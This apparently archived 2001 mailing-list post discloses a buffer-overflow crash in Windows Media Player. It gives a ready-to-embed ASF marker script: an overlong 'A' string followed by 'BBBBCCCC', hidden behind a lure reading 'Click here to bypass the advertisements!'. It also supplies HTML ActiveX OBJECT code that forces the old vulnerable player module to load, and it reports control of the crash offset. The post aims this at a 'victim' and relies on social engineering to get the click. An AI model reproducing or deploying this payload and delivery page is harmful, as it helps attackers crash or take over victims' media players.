I dunno if I've sent this before. If you embed a marker long enough in an .ASF video file you can make WMP crash when a victim clicks the marker drop down list under the file during playback. Use ASFCHOP.EXE to embed the following script to any ASF file: ----8<----cut-here-----8<---- start_marker_table 0.0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC 0.1 Click here to bypass the advertisements! end_marker_table ----8<----cut-here-----8<---- As you can see, I used a catch to persuade the victim to click the bar. When a victim clicks on the bar, WMP crashes at offset 43434343 ("CCCC"). With WMP7 you have to use an ActiveX object on a HTML page to launch the old buggy WMP module. Make sure you set marker bar visible in the parameters. I guess it's the parameter "ShowGotoBar" Dummy example: <OBJECT classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95 id=DSPlay1 name=DSPlay1 type="application/x-oleobject"> <PARAM NAME="ShowControls" VALUE="-1"> <PARAM NAME="ShowGotoBar" VALUE="1"> <PARAM NAME="ShowStatusBar" VALUE="1"> <PARAM NAME="ControlType" VALUE="2"> <PARAM NAME="Filename" VALUE="a.asf"> <PARAM NAME="InvokeURLs" VALUE="-1"> </OBJECT> _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
This archive was generated by hypermail 2b30 : Tue Aug 07 2001 - 12:08:18 PDT